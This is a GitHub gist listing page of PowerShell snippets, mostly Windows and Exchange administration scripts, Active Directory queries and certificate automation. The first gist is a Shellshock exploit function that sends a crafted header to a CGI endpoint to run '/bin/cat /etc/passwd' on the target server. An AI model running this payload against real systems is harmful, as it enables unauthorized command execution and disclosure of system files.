Skip to content

Instantly share code, notes, and snippets.


Block or report user

Report or block mendel129

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View PowerShell ShellShock
function invoke-shellshock($server)
(invoke-webrequest -Uri "http://$server/cgi-bin/status" -Headers @{"custom"="() { ignored; };echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "} -Method post).rawcontent
#(invoke-webrequest -Uri "http://$server/cgi-bin/status" -Headers @{"custom"="() { ignored; };echo Content-Type: text/html; echo ; /bin/ls . "} -Method post).rawcontent
View PowerShell DLNA Functions
function play(){
$var = getstate
if($var -eq "Paused")
$play='<?xml version="1.0" encoding="utf-8"?>
<s:Envelope s:encodingStyle="" xmlns:s="">
<u:Play xmlns:u="urn:av-openhome-org:service:Playlist:1" />
mendel129 / PoSh_OpenSSL_AES
Last active Dec 21, 2015
Needed to make powershell natively talk with gibberish-aes, with random salt (and this should be openssl compatible...)
View PoSh_OpenSSL_AES
#PowerShell to create an gibberishaes(and openssl) compatible aes string with salt
#thanks for .netcode ->
function OpenSSLEncrypt($passphrase, $plainText)
# generate salt
[byte[]] $key
[byte[]] $iv;
[byte[]] $salt = RandomByteArray
mendel129 / get-casstatus
Last active Dec 24, 2015
get all connected exchange users from client access servers
View get-casstatus
$RPC =Get-Counter "\MSExchange RpcClientAccess\User Count" -computername "srv1"
$OWA =Get-Counter "\MSExchange OWA\Current Unique Users" -computername "srv1"
$POP = Get-Counter "\MSExchangePop3(1)\Connections Current" -ComputerName "srv1"
$IMAP = get-counter "\MSExchangeImap4(1)\Current Connections" -ComputerName "srv1"
$csa=New-Object PSObject -Property @{
Server = srv1"
"rpc" = $RPC.CounterSamples[0].CookedValue
"owa" = $OWA.CounterSamples[0].CookedValue
"pop" = $POP.CounterSamples[0].CookedValue
"imap" = $IMAP.CounterSamples[0].CookedValue
mendel129 / test-fileversion
Last active Dec 24, 2015
Get a list of all server 2003, connect to them, and get the filversion of a specific dll, create a list and export it to a csv
View test-fileversion
#get a list from ad with all windows server 2003 and 2003 r2 machines
$list= get-ADComputer -Filter {OperatingSystem -Like "Windows Server*2003*"}
#intantiate an empty array
#connect to each computer, get the file, and select it's version
foreach($computer in $list){
$answer = Get-WMIObject -Computer $computer.DNSHostName -credential $admin -Query "SELECT * FROM CIM_DataFile WHERE Drive ='C:' AND Path='\\windows\\system32\\' AND FileName='crypt32' AND Extension='dll'" | select Version
#create a hashlist
mendel129 / find-scp
Last active Dec 24, 2015
gets known registered service connection points (currently only exchange and ad rights management services) from active directory domain
View find-scp
Script to find AD, find the known registered Service Connection Point's, an list some information about them.
detects dns domain on the network you're on
tries to detect default domain from dns server
connects to AD, get information about AD RMS, Exchange (possible to add others!)
mendel129 / Manage-LocalAdmin.ps1
Last active Mar 7, 2016
Microsoft LAPS,, doesn't handle user creation that well, and GPP is deprecated since ms14-025. Might get solved with startupscript (tested on win10)
View Manage-LocalAdmin.ps1
#Microsoft LAPS,, doesn't handle user creation that well, and GPP is deprecated since ms14-025
#might get solved with startupscript (tested on win10)
#get users in local administrator
$obj_group = [ADSI]"WinNT://$($env:COMPUTERNAME)/Administrators,group"
$Administrators = @($obj_group.psbase.Invoke("Members")) | foreach{([ADSI]$_).InvokeGet("Name")}
#get local users
$adsi = [ADSI]"WinNT://$($env:COMPUTERNAME)"
$Users = $adsi.psbase.children | where {$_.psbase.schemaClassName -match "user"} | select @{n="Name";e={$}}
mendel129 / csvto-3dict
Last active Feb 22, 2017
Quick and dirty PowerShell interface to 3D-ICT timesheet application
View csvto-3dict
# get all mondays, wednesdays and fridays of december
[int]$Month = '12'
[int]$Year = '2015'
# days not worked in december
$exceptions = @(9,11,13)
$alldays = @()
0..31 | ForEach-Object -Process {
$evaldate = (Get-Date -Year $Year -Month $Month -Day 1).AddDays($_)
mendel129 / set-certificate
Created Feb 22, 2017
Another quick and dirty PoC script to retreive a Let's Encrypt certificate and post it to Directadmin. Script receives token and uploads to FTP to verify domain ownership. Probably needs PowerShell 5.
View set-certificate
#import the ACMEsharp module -
#more info:
import-module .\ACMESharp\ACMESharp.psd1
#set global variables
$date = "$(get-date -format yyyy-MM-dd--HH-mm)"
$dnsname1 = "dns1-$date"
$dnsname2 = "dns2-$date"
#DirectAdmin and FTP credentials
$Username = "fancyusername"
View add-ntlmexception.ps1
# used together with the Windows security policy "Network security: Restricit NTLM.
# if all NTLM is blocked, a computer becomes pretty useless, so this script to create exceptions based on failed connections from the NTLM log
# Adds exception to Network security: Restricit NTLM: Add remote server exceptions for NTLM authentication
function add-ntlmexception
$event = Get-WinEvent -FilterHashTable @{LogName='Microsoft-Windows-NTLM/Operational'; ID = 4001} -maxevents 1
$newexception = ((([xml]$event.toxml()).Event.EventData.Data) | ?{$ -eq "targetname"}).'#text'
$regpath = "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0"
$regname = "clientallowedntlmservers"
$currentvalues = (Get-ItemProperty $regpath).$regname
You can’t perform that action at this time.